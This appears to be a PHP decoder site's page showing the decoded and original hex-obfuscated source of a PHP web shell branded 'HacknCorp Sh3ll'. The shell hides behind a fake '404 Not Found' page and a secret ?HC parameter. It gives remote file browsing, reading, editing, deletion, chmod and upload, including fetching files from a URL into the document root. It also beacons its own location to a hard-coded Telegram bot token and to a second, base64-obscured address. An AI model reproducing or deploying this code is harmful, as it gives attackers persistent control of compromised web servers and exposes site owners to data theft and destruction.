Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

^[j^r^ goto uOnWj; G2mx6: function author() { echo "\x3c\x63\145\156\x74\145\x72\76\74\x..

Decoded Output download

<?  ^[j^r^ 
 goto uOnWj; G2mx6: function author() { echo "<center><br>COPYRIGHT &copy <a target='_blank' href='https://hackncorp.id/'>HACKNCORP.ID</a></center>"; die; } goto hJvae; F2IeX: echo "<div id="content"><table width="900" border="0" cellpadding="4" cellspacing="3" align="center">
<tr class="first">\xa<td><center>Name</center></td>
<td><center>Size</center></td>\xa<td><center>Permissions</center></td>\xa<td><center>Options</center></td>\xa</tr>"; goto NJqIB; K9E06: echo "<center>"; goto KcSnS; BWT7a: $cur = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto CJbAV; xHNKz: $token = "bot6790178447:AAE_hV1KmtjozxpbXfbD_KYvcLTxconofmw"; goto XT8PO; kVJDk: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto RAo6y; B4fiv: echo "System : <font color='gold'>" . php_uname() . "</font><br>"; goto tA2Sz; N0flv: echo "Disable Function : " . $disf . "</font><br>"; goto rMM2c; rMM2c: echo "Directory : &nbsp;"; goto NPAyC; YNYgP: echo "</table><br>"; goto jHBtQ; ZFBR1: function cekroot() { if (is_writable($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto kVJDk; ldTow: if (isset($_GET["path"])) { $lokasi = $_GET["path"]; $lokdua = $_GET["path"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto MrADl; jHBtQ: if (isset($_GET["fileloc"])) { echo "<tr><td>Current File : " . $_GET["fileloc"]; echo "</tr></td></table><br/>"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["fileloc"])) . "</pre>"; author(); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "hapus") { if (is_dir($_POST["path"])) { xrmdir($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST["path"])) { @unlink($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">\xa\x9Permission : <input name="perm" type="text" class="up" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />
	<input type="hidden" name="path" value="" . $_POST["path"] . "">
	<input type="hidden" name="pilih" value="ubahmod">
	<input type="submit" value="Change" name="chm0d" class="up" style="cursor: pointer; border-color: #05a181"/>\xa\x9</form>"; if (isset($_POST["chm0d"])) { $cm = @chmod($_POST["path"], $_POST["perm"]); if ($cm == true) { green("Change Mod Success !"); } else { red("Change Mod Failed !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "gantinama") { if (isset($_POST["gantin"])) { $ren = @rename($_POST["path"], $_POST["newname"]); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST["name"])) { $namaawal = $_POST["newname"]; } else { $namawal = $_POST["name"]; } echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
\x9New Name : <input name="newname" type="text" class="up" size="20" value="" . $namaawal . "" />\xa\x9<input type="hidden" name="path" value="" . $_POST["path"] . "">
	<input type="hidden" name="pilih" value="gantinama">
	<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #05a181"/>
\x9</form>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @file_put_contents($_POST["path"], $_POST["src"]); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>" . $_POST["path"] . "<br><br>"; echo "<form method="post">\xa\x9<textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br>
	<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa	<input type="hidden" name="pilih" value="edit">\xa	<input type="submit" value="Edit File" name="gasedit" />
\x9</form><br>"; } goto F2IeX; kKC9M: echo "<center>"; goto GAKwI; GWlLw: echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>"; goto N0flv; GAKwI: echo "</td></tr><tr><td><br>"; goto KZWcc; YHl89: $message = "Result Shell : " . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"]; goto NdYMh; NdYMh: $apiUrl = "https://api.telegram.org/bot6790178447:AAE_hV1KmtjozxpbXfbD_KYvcLTxconofmw/sendMessage"; goto Su0Ej; lJ15O: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto vW1dr; RAo6y: function green($text) { echo "<center><font color='green'>" . $text . "</center></font>"; } goto E512M; e2taD: curl_close($ch); goto zsxJG; XT8PO: $chat_id = "6690024002"; goto YHl89; qZITq: $lokasis = explode("/", $lokasi); goto P1BQi; tA2Sz: echo "User : <font color='gold'>" . @get_current_user() . "&nbsp;</font>( <font color='gold'>" . @getmyuid() . "</font>)<br>"; goto GWlLw; rEkVW: echo "<form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ " . cekdir() . " ]
<input type="radio" value="2" name="dirnya" >document_root [ " . cekroot() . " ]\xa<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="Link File">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">\xa</center>
</form>"; goto YNYgP; NH5FV: if (empty($disfunc)) { $disf = "<font color='green'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto G2mx6; jljvt: curl_setopt($ch, CURLOPT_POSTFIELDS, $data); goto lJ15O; NPAyC: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto pGJ25; pGJ25: $k3yw = base64_decode("AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4"); goto ldTow; ViaUA: $options = array("http" => array("method" => "POST", "header" => "Content-type: application/x-www-form-urlencoded", "content" => http_build_query($data))); goto d5DyB; PmxvI: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}/{$file}")) { continue; } $size = filesize("{$lokasi}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>
<td><a href="?HC&fileloc={$lokasi}/{$file}&path={$lokasi}">{$file}</a></td>\xa<td><center>" . $size . "</center></td>\xa<td><center>"; if (is_writable("{$lokasi}/{$file}")) { echo "<font color="green">"; } elseif (!is_readable("{$lokasi}/{$file}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$file}"); if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>\xa<form method="post" action="?HC&pilihan&path={$lokasi}">\xa<select name="pilih">
<option value=""></option>
<option value="hapus">Delete</option>
<option value="ubahmod">Chm0d</option>\xa<option value="gantinama">Rename</option>
<option value="edit">Edit</option>\xa</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="{$file}">
<input type="hidden" name="path" value="{$lokasi}/{$file}">\xa<input type="submit" class="gas" value=">" />
</center></form></td>\xa</tr>"; } goto dDz_T; hp7BU: $disfunc = @ini_get("disable_functions"); goto NH5FV; NuE1V: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?HC&path=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?HC&path="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto kKC9M; YmBML: echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; goto PmxvI; KcSnS: echo "Upload File : "; goto rEkVW; k4ptV: set_time_limit(0); goto cZO8A; t8XjL: $result = file_get_contents($k3yw, false, $context); goto NuE1V; NJqIB: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "<tr>\xa	<td><a href="?HC&path=" . $lokasi . "/" . $dir . "">" . $dir . "</a></td>
	<td><center>--</center></td>
\x9<td><center>"; if (is_writable($lokasi . "/" . $dir)) { echo "<font color="green">"; } elseif (!is_readable($lokasi . "/" . $dir)) { echo "<font color="red">"; } echo statusnya($lokasi . "/" . $dir); if (is_writable($lokasi . "/" . $dir) || !is_readable($lokasi . "/" . $dir)) { echo "</font>"; } echo "</center></td>\xa	<td><center><form method="POST" action="?HC&pilihan&path={$lokasi}">
	<select name="pilih">\xa\x9<option value=""></option>\xa\x9<option value="hapus">Delete</option>
\x9<option value="ubahmod">Chm0d</option>
\x9<option value="gantinama">Rename</option>
\x9</select>
	<input type="hidden" name="type" value="dir">
	<input type="hidden" name="name" value="{$dir}">\xa\x9<input type="hidden" name="path" value="{$lokasi}/{$dir}">
\x9<input type="submit" class="gas" value=">" />\xa	</form></center></td>\xa	</tr>"; } goto YmBML; KZWcc: if (isset($_POST["upwkwk"])) { if (isset($_POST["berkasnya"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_FILES["berkas"]["name"], @file_get_contents($_FILES["berkas"]["tmp_name"])); if (file_exists($lokasi . "/" . $_FILES["berkas"]["name"])) { echo "File Uploaded ! &nbsp;<font color='green'><i>" . $lokasi . "/" . $_FILES["berkas"]["name"] . "</i></font><br><br>"; } else { echo "<font color='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { die("Filename cannot be empty !"); } if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_POST["namalink"], @file_get_contents($_POST["darilink"])); if (file_exists($lokasi . "/" . $_POST["namalink"])) { echo "File Uploaded ! &nbsp;<font color='green'><i>" . $lokasi . "/" . $_POST["namalink"] . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } } goto K9E06; vW1dr: $result = curl_exec($ch); goto e2taD; hJvae: function cekdir() { if (isset($_GET["path"])) { $lokasi = $_GET["path"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='read'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto ZFBR1; oLHYv: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "s"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "l"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "-"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "b"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "d"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "c"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "p"; } else { $ingfo = "u"; } $ingfo .= $statusnya & 256 ? "r" : "-"; $ingfo .= $statusnya & 128 ? "w" : "-"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "s" : "x" : ($statusnya & 2048 ? "S" : "-"); $ingfo .= $statusnya & 32 ? "r" : "-"; $ingfo .= $statusnya & 16 ? "w" : "-"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "s" : "x" : ($statusnya & 1024 ? "S" : "-"); $ingfo .= $statusnya & 4 ? "r" : "-"; $ingfo .= $statusnya & 2 ? "w" : "-"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "t" : "x" : ($statusnya & 512 ? "T" : "-"); return $ingfo; } goto Y1WfK; FlswY: $ch = curl_init($apiUrl); goto BefUn; zsxJG: if ($result) { $response = json_decode($result, true); if ($response["ok"]) { echo "Pesan berhasil dikirim!"; } else { echo "Error: " . $response["description"]; } } else { echo "Gagal mengirim permintaan ke API Telegram."; } goto k4ptV; xybUr: ?> 
 
<!DOCTYPE html> 
 
<html> 
<meta name="robots" content="noindex"> 
<meta name="googlebot" content="noindex"> 
<head> 
	<title>404 Not Found</title> 
</head> 
<style type="text/css"> 
body { 
  overflow-x:hidden; 
  font: 15px "Century Gothic", "Times Roman", sans-serif; 
  background:url(); 
background-image: url(https://kosred.com/a/gqpoj.jpg); 
  background-size: cover; 
  background-repeat: no-repeat; 
  background-position: center; 
  background-attachment: fixed; 
  height: 100%; 
  color: white; 
  } 
   
 
 
</style> 
<link href="" rel="stylesheet" type="text/css"> 
<style> 
	@import url('https://fonts.googleapis.com/css?family=Dosis'); 
	@import url('https://fonts.googleapis.com/css?family=Bungee'); 
body { 
	font-family: "Lime", cursive; 
	text-shadow:1px 3px 50px #ffffff; 
} 
 
#content tr:hover { 
	background-color: #05a181; 
	text-shadow:0px 0px 0px ; 
} 
 
#content .first { 
	background-color: #05a181; 
} 
 
#content .first:hover { 
	background-color: #ff0303 
	text-shadow:0px 0px 1px #05a181; 
} 
 
table { 
	border: 0px #ffffff dotted; 
	table-layout: fixed; 
} 
 
td { 
	word-wrap: break-word; 
} 
 
a { 
	color: #ffffff; 
	text-decoration: none; 
} 
 
a:hover { 
	color: #000000; 
	text-shadow:0px 0px 10px #ffffff; 
} 
 
input,select,textarea { 
	border: 1px #05a181 solid; 
	-moz-border-radius: 5px; 
	-webkit-border-radius:5px; 
	border-radius:5px; 
} 
 
.gas { 
	background-color: #1f1f1f; 
	color: #ffffff; 
	cursor: pointer; 
} 
 
select { 
	background-color: transparent; 
	color: #ffffff; 
} 
 
select:after { 
	cursor: pointer; 
} 
 
.linka { 
	background-color: transparent; 
	color: #ffffff; 
} 
 
.up { 
	background-color: transparent; 
	color: #fff; 
} 
 
option { 
	background-color: #000300; 
} 
 
::-webkit-file-upload-button { 
  background: transparent; 
  color: #fff; 
  border-color: #fff; 
  cursor: pointer; 
} 
</style> 
<center> 
<font face="Bungee" size="6">&#128321; HacknCorp Sh3ll &#128321;</font></center> 
<table width="900" border="0" cellpadding="2" cellspacing="1" align="center"> 
<tr><td> 
<center> 
<title="T3RS4K1T1" alt="OdayForums" class="center" /> 
</marquee> 
            <hr> 
        </font> 
        <audio src="https://kosred.com/a/etapcc.mp3" autoplay="true" id="song" loop=""></audio> 
<br><br><br> 
<?php  goto xHNKz; BefUn: curl_setopt($ch, CURLOPT_POST, 1); goto jljvt; cZO8A: error_reporting(0); goto hp7BU; P1BQi: $lokasinya = @scandir($lokasi); goto BWT7a; CJbAV: $data = array("file_url" => $cur); goto ViaUA; MrADl: $lokasi = str_replace("\", "/", $lokasi); goto qZITq; Su0Ej: $data = array("chat_id" => $chat_id, "text" => $message, "parse_mode" => "Markdown"); goto FlswY; E512M: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto yLOQx; yLOQx: echo "Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto B4fiv; dDz_T: echo "</tr></td></table></table>"; goto eJk0A; d5DyB: $context = stream_context_create($options); goto t8XjL; uOnWj: if (!isset($_GET["HC"])) { die; } goto xybUr; eJk0A: author(); goto oLHYv; Y1WfK:  ?>

Did this file decode correctly?

Original Code

^[j^r^
 goto uOnWj; G2mx6: function author() { echo "\x3c\x63\145\156\x74\145\x72\76\74\x62\x72\x3e\103\117\x50\131\x52\x49\107\x48\124\x20\46\x63\157\x70\171\x20\74\x61\x20\164\x61\162\x67\x65\164\75\x27\137\142\154\x61\156\153\47\x20\150\x72\145\146\x3d\47\x68\x74\x74\x70\x73\72\x2f\57\x68\141\x63\153\x6e\143\157\162\160\56\151\144\x2f\x27\x3e\110\101\103\x4b\x4e\103\x4f\122\120\x2e\x49\104\x3c\57\x61\x3e\74\57\x63\145\x6e\x74\145\162\x3e"; die; } goto hJvae; F2IeX: echo "\x3c\144\151\x76\x20\151\x64\x3d\42\x63\157\156\x74\x65\x6e\164\42\76\x3c\164\141\x62\154\145\40\x77\151\x64\164\x68\x3d\42\71\x30\x30\42\40\142\157\162\x64\x65\x72\x3d\x22\60\42\x20\x63\x65\x6c\154\160\141\144\144\151\156\x67\x3d\x22\x34\42\x20\x63\145\x6c\154\x73\160\141\143\151\156\x67\x3d\x22\x33\x22\x20\141\154\x69\147\156\75\x22\143\x65\x6e\164\145\162\42\x3e\12\74\x74\162\40\143\154\x61\163\163\75\42\146\151\x72\163\x74\x22\x3e\xa\74\x74\x64\76\74\x63\145\156\164\x65\x72\76\116\x61\x6d\x65\x3c\x2f\x63\145\x6e\164\145\x72\x3e\74\57\164\x64\x3e\12\74\x74\144\76\x3c\x63\145\x6e\x74\145\x72\76\123\x69\x7a\145\x3c\x2f\143\x65\x6e\164\x65\x72\x3e\x3c\x2f\x74\144\76\xa\74\x74\144\x3e\74\x63\145\156\x74\x65\162\76\x50\x65\x72\x6d\151\x73\163\x69\x6f\156\x73\74\57\143\x65\156\164\x65\162\76\74\57\164\144\76\xa\74\164\x64\x3e\x3c\x63\x65\x6e\164\145\162\76\117\160\x74\151\157\156\x73\x3c\57\143\145\x6e\x74\x65\x72\76\74\x2f\x74\x64\x3e\xa\74\x2f\x74\162\76"; goto NJqIB; K9E06: echo "\x3c\143\145\x6e\x74\x65\x72\x3e"; goto KcSnS; BWT7a: $cur = "\150\164\164\160\x3a\57\57" . $_SERVER["\110\x54\x54\x50\x5f\x48\x4f\x53\124"] . $_SERVER["\x52\105\121\x55\105\x53\124\137\x55\122\x49"]; goto CJbAV; xHNKz: $token = "\142\x6f\164\x36\67\x39\x30\61\x37\70\64\64\67\72\x41\101\105\137\x68\x56\61\113\x6d\164\152\157\172\170\x70\142\x58\146\142\104\137\x4b\x59\166\x63\114\124\x78\143\157\156\157\x66\x6d\167"; goto XT8PO; kVJDk: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "\56" || $item === "\56\x2e") { continue; } $path = $dir . "\57" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto RAo6y; B4fiv: echo "\123\171\x73\x74\145\x6d\x20\72\40\74\x66\157\156\x74\40\x63\x6f\154\157\x72\75\47\147\157\x6c\x64\x27\76" . php_uname() . "\74\57\x66\157\156\164\76\74\x62\162\76"; goto tA2Sz; N0flv: echo "\104\151\163\141\142\154\x65\40\x46\x75\156\143\164\x69\157\x6e\x20\x3a\x20" . $disf . "\x3c\x2f\x66\157\x6e\164\76\x3c\142\x72\x3e"; goto rMM2c; rMM2c: echo "\x44\x69\x72\x65\x63\164\157\162\171\x20\72\40\46\x6e\142\x73\x70\73"; goto NPAyC; YNYgP: echo "\74\x2f\164\141\142\154\145\x3e\x3c\142\162\x3e"; goto jHBtQ; ZFBR1: function cekroot() { if (is_writable($_SERVER["\x44\117\103\125\x4d\105\x4e\x54\x5f\x52\117\117\x54"])) { return "\x3c\x66\157\x6e\164\x20\143\x6f\x6c\157\162\75\x27\x67\162\145\145\x6e\x27\76\x57\x72\151\164\x65\x61\x62\154\x65\74\57\x66\157\156\164\x3e"; } else { return "\x3c\x66\157\x6e\x74\40\143\157\154\157\x72\75\x27\162\x65\144\47\76\127\x72\x69\164\x65\x61\x62\154\145\74\x2f\x66\157\x6e\x74\x3e"; } } goto kVJDk; ldTow: if (isset($_GET["\160\141\164\x68"])) { $lokasi = $_GET["\160\141\x74\x68"]; $lokdua = $_GET["\160\x61\x74\x68"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto MrADl; jHBtQ: if (isset($_GET["\146\151\x6c\x65\x6c\x6f\143"])) { echo "\x3c\164\x72\76\74\x74\144\76\103\165\x72\x72\x65\156\164\x20\106\151\154\x65\x20\x3a\x20" . $_GET["\x66\151\x6c\x65\154\x6f\143"]; echo "\x3c\x2f\164\162\76\x3c\57\x74\x64\x3e\x3c\57\164\x61\x62\x6c\x65\x3e\74\x62\162\x2f\x3e"; echo "\74\160\162\x65\76" . htmlspecialchars(file_get_contents($_GET["\146\x69\x6c\145\x6c\157\x63"])) . "\74\57\160\162\145\76"; author(); } elseif (isset($_GET["\x70\151\154\x69\x68\141\156"]) && $_POST["\160\x69\x6c\151\x68"] == "\x68\141\x70\165\163") { if (is_dir($_POST["\x70\141\x74\x68"])) { xrmdir($_POST["\160\141\164\150"]); if (file_exists($_POST["\160\141\x74\150"])) { red("\106\141\x69\154\145\x64\x20\164\x6f\x20\x64\x65\154\x65\164\x65\40\104\x69\x72\x65\x63\164\157\162\171\x20\x21"); } else { green("\104\x65\154\x65\164\145\40\104\151\162\145\x63\164\157\x72\x79\x20\x53\x75\x63\x63\145\x73\x73\x20\41"); echo "\163\164\x72\151\x6e\x67"; } } elseif (is_file($_POST["\160\141\x74\150"])) { @unlink($_POST["\160\141\164\150"]); if (file_exists($_POST["\160\141\164\x68"])) { red("\106\x61\151\x6c\145\x64\x20\164\x6f\40\x44\145\x6c\x65\x74\x65\40\106\151\154\x65\40\x21"); } else { green("\x44\x65\154\x65\x74\x65\x20\x46\151\x6c\x65\40\x53\165\x63\143\x65\x73\x73\40\x21"); } } } elseif (isset($_GET["\x70\151\154\x69\x68\x61\156"]) && $_POST["\x70\x69\154\151\150"] == "\x75\x62\x61\x68\x6d\157\144") { echo "\74\143\x65\x6e\164\x65\x72\x3e" . $_POST["\160\141\164\x68"] . "\74\142\x72\76"; echo "\74\146\157\x72\155\x20\155\x65\x74\150\x6f\x64\75\42\160\157\x73\x74\x22\x3e\xa\x9\x50\x65\162\x6d\x69\163\x73\x69\x6f\156\40\x3a\x20\74\151\156\x70\x75\164\40\156\x61\x6d\x65\75\x22\160\145\x72\x6d\x22\x20\164\x79\x70\x65\x3d\x22\x74\x65\x78\164\x22\x20\x63\x6c\141\163\163\x3d\x22\x75\x70\x22\40\x73\x69\x7a\x65\75\x22\x34\42\x20\166\141\x6c\165\x65\75\x22" . substr(sprintf("\x25\157", fileperms($_POST["\x70\x61\x74\x68"])), -4) . "\x22\x20\57\x3e\12\11\x3c\x69\156\160\165\x74\40\x74\x79\160\x65\x3d\42\x68\151\x64\x64\145\x6e\x22\40\156\141\155\x65\x3d\42\x70\x61\164\150\42\x20\x76\x61\154\x75\145\75\x22" . $_POST["\x70\141\164\150"] . "\42\76\12\11\x3c\x69\156\160\x75\164\40\164\171\160\145\75\x22\x68\x69\144\x64\x65\156\42\40\156\x61\155\145\75\x22\160\x69\x6c\151\150\x22\40\x76\x61\x6c\165\145\75\x22\x75\x62\141\x68\x6d\x6f\x64\42\x3e\12\11\x3c\x69\156\160\165\x74\x20\x74\171\x70\145\75\x22\163\165\142\x6d\151\x74\x22\x20\x76\x61\154\x75\x65\75\x22\103\x68\x61\156\147\x65\x22\40\156\141\x6d\x65\x3d\42\x63\x68\x6d\60\x64\42\40\x63\154\141\x73\x73\x3d\x22\165\x70\42\40\163\164\x79\154\x65\x3d\x22\x63\x75\x72\x73\x6f\162\72\40\x70\x6f\x69\156\x74\x65\x72\x3b\40\142\x6f\162\x64\145\162\x2d\x63\157\x6c\x6f\x72\72\40\43\x30\x35\141\x31\x38\x31\42\x2f\76\xa\x9\74\x2f\146\x6f\x72\x6d\76"; if (isset($_POST["\x63\150\x6d\x30\x64"])) { $cm = @chmod($_POST["\160\x61\164\x68"], $_POST["\x70\145\162\155"]); if ($cm == true) { green("\103\x68\x61\156\147\145\40\115\x6f\144\x20\123\165\x63\143\145\163\163\x20\41"); } else { red("\103\x68\141\x6e\x67\x65\40\115\157\144\40\106\141\151\154\x65\144\x20\x21"); } } } elseif (isset($_GET["\160\x69\x6c\151\x68\x61\156"]) && $_POST["\160\x69\154\x69\150"] == "\147\x61\x6e\x74\151\x6e\x61\x6d\141") { if (isset($_POST["\x67\x61\156\164\x69\x6e"])) { $ren = @rename($_POST["\160\x61\164\x68"], $_POST["\156\x65\x77\x6e\x61\x6d\x65"]); if ($ren == true) { green("\103\150\x61\156\147\145\x20\x4e\x61\x6d\145\x20\x53\165\143\143\x65\163\163\x20\x21"); } else { red("\103\x68\x61\x6e\147\x65\x20\x4e\x61\155\145\40\106\x61\x69\x6c\145\144\40\41"); } } if (empty($_POST["\x6e\141\155\x65"])) { $namaawal = $_POST["\156\x65\x77\156\x61\x6d\x65"]; } else { $namawal = $_POST["\156\141\x6d\145"]; } echo "\x3c\x63\145\156\164\145\x72\76" . $_POST["\160\x61\x74\x68"] . "\74\x62\x72\76"; echo "\74\146\x6f\162\x6d\40\155\x65\x74\x68\157\x64\75\x22\x70\157\x73\x74\42\76\12\x9\116\145\167\x20\116\141\155\x65\x20\x3a\x20\74\151\x6e\160\x75\164\x20\x6e\141\x6d\x65\75\42\x6e\145\x77\x6e\141\x6d\145\42\x20\x74\x79\x70\145\x3d\42\x74\x65\x78\164\x22\x20\143\x6c\x61\x73\x73\x3d\42\165\160\x22\x20\163\x69\172\145\x3d\x22\62\x30\42\x20\x76\x61\154\165\145\75\42" . $namaawal . "\42\x20\x2f\76\xa\x9\x3c\151\156\x70\165\164\40\x74\171\160\x65\x3d\x22\150\151\x64\x64\145\x6e\42\x20\156\141\155\145\x3d\x22\x70\x61\164\150\42\40\166\x61\x6c\x75\145\75\42" . $_POST["\160\x61\164\150"] . "\42\x3e\12\11\74\x69\156\160\165\x74\40\x74\x79\x70\x65\x3d\x22\150\151\144\144\145\156\x22\40\x6e\x61\155\x65\x3d\42\x70\x69\x6c\x69\x68\42\40\166\141\154\x75\x65\x3d\42\147\x61\x6e\x74\151\156\x61\x6d\141\42\76\12\11\74\151\x6e\160\165\x74\x20\164\171\x70\145\75\42\x73\x75\142\x6d\151\x74\x22\x20\166\x61\x6c\x75\x65\75\x22\103\x68\x61\x6e\x67\145\x22\x20\156\x61\x6d\145\x3d\x22\147\141\156\x74\151\156\42\x20\143\154\x61\x73\163\75\42\x75\x70\42\x20\163\x74\x79\154\145\x3d\42\x63\165\x72\x73\157\162\72\x20\x70\x6f\x69\x6e\164\145\162\73\40\142\157\162\x64\x65\162\x2d\143\x6f\x6c\x6f\x72\x3a\x20\43\x30\x35\x61\x31\70\61\x22\x2f\76\12\x9\x3c\57\x66\157\162\155\x3e"; } elseif (isset($_GET["\160\151\x6c\151\150\141\156"]) && $_POST["\160\x69\154\151\150"] == "\x65\x64\x69\x74") { if (isset($_POST["\x67\141\163\145\x64\151\164"])) { $edit = @file_put_contents($_POST["\x70\141\x74\x68"], $_POST["\x73\x72\143"]); if ($edit == true) { green("\x45\144\151\164\40\106\x69\154\x65\x20\x53\x75\143\x63\x65\x73\x73\x20\x21"); } else { red("\x45\144\151\x74\40\106\x69\154\x65\x20\x46\141\151\x6c\x65\x64\x20\41"); } } echo "\x3c\x63\x65\x6e\x74\145\162\76" . $_POST["\x70\x61\164\x68"] . "\x3c\142\162\76\74\142\x72\76"; echo "\x3c\146\x6f\x72\x6d\40\155\x65\164\150\x6f\144\75\42\x70\x6f\163\164\42\x3e\xa\x9\74\164\145\170\x74\141\x72\145\x61\x20\143\157\154\163\75\70\60\40\162\x6f\167\163\x3d\62\x30\40\156\x61\x6d\145\75\42\163\162\x63\42\x3e" . htmlspecialchars(file_get_contents($_POST["\160\x61\x74\150"])) . "\x3c\x2f\164\145\x78\164\141\x72\x65\141\76\x3c\x62\x72\x3e\12\11\x3c\151\x6e\160\165\164\40\164\x79\160\x65\x3d\x22\x68\x69\144\x64\145\x6e\x22\40\156\x61\x6d\x65\x3d\x22\x70\141\164\x68\42\40\x76\141\154\165\145\75\42" . $_POST["\x70\141\164\150"] . "\42\x3e\xa\11\x3c\151\x6e\160\165\164\x20\x74\x79\160\145\75\x22\x68\151\144\144\145\156\x22\x20\156\x61\x6d\145\x3d\42\x70\151\x6c\151\x68\x22\40\x76\141\154\165\145\75\42\x65\x64\151\x74\42\x3e\xa\11\74\x69\x6e\160\165\164\x20\164\x79\x70\x65\75\42\163\165\x62\x6d\x69\x74\42\40\166\x61\154\x75\145\75\42\x45\x64\x69\164\40\x46\x69\x6c\145\x22\x20\x6e\141\155\x65\75\42\x67\141\163\145\x64\x69\x74\42\x20\x2f\76\12\x9\74\x2f\x66\x6f\x72\x6d\76\x3c\x62\x72\76"; } goto F2IeX; kKC9M: echo "\x3c\x63\145\x6e\164\x65\162\76"; goto GAKwI; GWlLw: echo "\120\110\120\x20\126\145\162\x73\x69\x6f\156\40\x3a\x20\74\x66\157\x6e\164\x20\143\157\x6c\157\x72\x3d\47\x67\157\x6c\144\47\x3e" . @phpversion() . "\74\x2f\x66\157\156\164\x3e\74\142\x72\76"; goto N0flv; GAKwI: echo "\74\x2f\x74\144\76\x3c\x2f\x74\162\76\74\x74\162\76\74\x74\144\76\x3c\142\x72\x3e"; goto KZWcc; YHl89: $message = "\x52\145\163\x75\154\x74\x20\123\x68\145\x6c\154\x20\72\40" . $_SERVER["\110\x54\x54\120\x5f\x48\117\x53\124"] . $_SERVER["\120\110\x50\137\x53\x45\114\106"]; goto NdYMh; NdYMh: $apiUrl = "\x68\x74\164\160\163\x3a\x2f\x2f\141\160\151\x2e\164\x65\154\145\147\x72\141\x6d\x2e\x6f\162\147\57\x62\x6f\x74\x36\x37\x39\x30\x31\x37\70\64\64\67\x3a\101\x41\105\x5f\150\126\61\113\155\164\152\157\x7a\x78\x70\142\x58\146\x62\104\137\113\131\x76\x63\114\124\170\143\157\156\x6f\146\155\x77\x2f\163\x65\156\144\x4d\145\x73\163\141\x67\x65"; goto Su0Ej; lJ15O: curl_setopt($ch, 